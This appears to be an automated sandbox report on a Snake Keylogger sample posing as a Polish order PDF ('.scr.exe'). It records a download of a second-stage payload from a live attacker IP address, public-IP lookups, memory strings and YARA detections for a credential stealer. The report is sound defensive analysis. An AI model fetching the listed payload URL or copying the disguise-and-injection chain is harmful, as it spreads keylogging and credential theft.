Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windo.pdb" source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb2 source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO24 source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.0.30319\InstallUtil.pdbd source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb~ source: InstallUtil.exe, 00000002.00000002.2547904821.00000264286EE000.00000004.00000020.00020000.00000000.sdmp

Networking

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Bad PDF prefix: HTTP/1.1 200 OK Date: Mon, 07 Apr 2025 06:37:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 07 Apr 2025 02:28:51 GMT ETag: "d5eec-63226ff2e797c" Accept-Ranges: bytes Content-Length: 876268 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 00 3a 10 00 1f 8b 08 00 00 00 00 00 04 00 ec bd 77 60 16 c5 f3 3f 7e e9 bd 5c 9e f0 24 24 90 e7 e8 0f 51 11 15 e4 12 a5 a9 a0 62 05 41 9f 20 4a 47 41 25 0a 8a 1d b1 37 40 11 bb 31 2a f6 de b0 0b 8a 22 76 05 04 2b 08 76 41 05 01 95 22 84 ef eb 35 7b b7 77 97 3c 81 d8 3e bf df 1f 6f f4 b9 ec ed ce ce ce ce ce ee ce ce ce ee 1d 36 f8 5a 23 c9 30 8c 64 fc b6 6f 37 8c e7 0d f5 af 97 b1 f3 7f 53 f0 cb 8d bc 98 6b cc ce 78 bf d5 f3 09 87 be df 6a e0 89 63 27 5a a7 4e a8 3e 61 c2 f0 53 ac 91 c3 c7 8f af 3e dd 1a 31 da 9a 70 c6 78 6b ec 78 eb 80 23 8e b2 4e a9 1e 35 ba 53 4e 4e 66 5b 07 c7 91 7d 0c e3 d0 84 24 e3 38 7b c3 09 2e de 95 46 6e ab ac 84 ce 86 b1 67 be 61 a4 aa b8 f1 fd 11 b6 10 18 96 af a8 63 38 51 d1 6d 18 de 5f e3 ce 7c 89 e7 bf 24 a3 d7 a5 86 91 2f ff 7b 7f 0d 23 cf 57 07 0b 78 0f 31 14 de 5d 93 e2 55 32 df c8 6e 02 2f 1a fc 03 7d e9 be d7 74 bc 1f e4 7b ef 74 fa e8 b3 4e c7 df d3 f7 70 ea b5 a7 47 b7 0f c5 b0 4e 13 26 4e 18 89 b0 d0 c6 ba b3 a2 5d f2 03 70 bd 0c e3 d5 4e 13 46 9f 5c 0d c0 6c 87 66 c1 65 37 80 db af 3e 99 47 f6 57 30 a4 2d d1 48 31 ee 0c 27 1a b3 7f 4d 34 12 9c f4 81 69 29 c6 65 7d b3 8c 1b 8f cc 97 f6 de d9 bf 50 e7 24 63 0d fe 22 bf 19 ed 94 64 a4 5a 24 bc 2e 17 c4 30 b9 0e f4 f5 61 93 de 88 5f 47 fc 26 e0 97 82 df 61 f8 1d 4e 92 67 e0 11 6d cb 8c ac c1 e4 51 89 46 f2 b9 f3 f0 a8 7c 63 fb f6 ed ed 25 d2 7e 11 c1 e8 4d 89 80 31 34 cc 1d 84 b9 4b 60 18 69 df 88 60 79 b4 30 19 40 09 1a e8 34 02 9d 27 40 8c b4 4f 23 22 10 e8 47 74 37 1e 15 31 81 21 61 f6 61 84 b9 80 85 25 6b 98 47 89 a7 8b 57 58 c7 ed ec 3b ad 77 49 89 1e ff e3 e9 63 cb 0d 15 fe 20 94 da 9b e1 fd 10 1e f4 5e d2 c1 93 51 66 72 61 5d 02 e3 f6 46 dc f0 c3 d3 f7 96 b8 72 c5 37 2d c3 86 51 ce f7 29 01 3e 26 34 e0 23 39 db c9 e1 df 31 42 06 09 9c 0f da a2 43 d2 02 75 ba 81 75 7a cf a3 77 1e 82 93 df 20 e0 b0 b4 00 83 c6 13 f0 6e 8f d3 37 93 8b 05 86 51 44 9a f1 b7 b0 dc f8 af 69 7d 98 bc 6d 9c 56 4f 2a 5e 25 e0 ce 68 f5 fd 35 e2 bd 27 75 4e 0f d4 25 a1 05 fb c1 03 89 e7 b5 4d 9a a2 a2 ae 4a 3e ec 93 e4 8a 22 54 af a9 f5 dc dd 50 c3 96 88 0f 0b 29 8f 5b d1 11 a4 ff 5d af a2 af 06 2b ea 01 8a f8 cf f2 2a 7a 13 82 f5 eb 19 ac 47 51 79 ef 16 2a 34 15 bf eb 40 54 19 12 2b 98 02 f2 1b 83 bd 0b bf 59 a8 d2 fe 89 1e 6c a8 73 72 00 b6 7e db 37 c0 d5 45 0d 3d e8 0e 46 5b e0 6a 83 97 b1 1e bc f1 00 7e 19 88 7b 12 bf 4a 84 5b 38 7c fd 3b f2 b4 bb c3 e3 4e 2e 9f e3 b2 f9 ae 38 b2 5f 1e 97 cf 57 11 72 27 7c fe 97 65 60 2e 8b 6c 5c 06 bc 8e 79 4b 13 64 20 d4 39 d5 c7 c7 c2 38 7c 4c 8c 4b 6b 8a 8f 5e 49 f1 d3 ea 91 f0 b8 47 6b 42 1c 5a bd 4a 4d f0 68 35 1a a7 35 b9 1e ad ff 7b ff df fb ff e5 7b d3 fa 86 3b 67 b1 7f a8 39 2b 9e c4 3f 1b 67 ce 8a df 89 1e f1 c6 18 e9 44

Source: Joe Sandbox View

IP Address: 158.101.44.242 158.101.44.242

Source: unknown

DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /ADOLF/Nnjlcgpkdo.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 11; en-US; SM-A107F) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 UCBrowser/13.4.0.1306 Mobile Safari/537.36Host: 161.248.239.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119
Source: unknown	TCP traffic detected without corresponding DNS query: 161.248.239.119

Source: global traffic	HTTP traffic detected: GET /ADOLF/Nnjlcgpkdo.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 11; en-US; SM-A107F) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 UCBrowser/13.4.0.1306 Mobile Safari/537.36Host: 161.248.239.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: checkip.dyndns.org

Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://161.248.239.119
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdf
Source: zam#U00f3wienie 12832025_pdf .scr.exe	String found in binary or memory: http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdfW&
Source: InstallUtil.exe, 00000002.00000002.2548659789.000002642A33D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000002.00000002.2548659789.000002642A33D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: zam#U00f3wienie 12832025_pdf .scr.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5604 -s 1424

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static PE information: No import functions for PE file found

Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A711000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68AD01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1618319581.000002C6A3110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTxvbdg.dll" vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619439795.000002C6A33A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000000.1297903026.000002C688A98000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePchqowhldi.exe6 vs zam#U00f3wienie 12832025_pdf .scr.exe
Source: zam#U00f3wienie 12832025_pdf .scr.exe	Binary or memory string: OriginalFilenamePchqowhldi.exe6 vs zam#U00f3wienie 12832025_pdf .scr.exe

Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
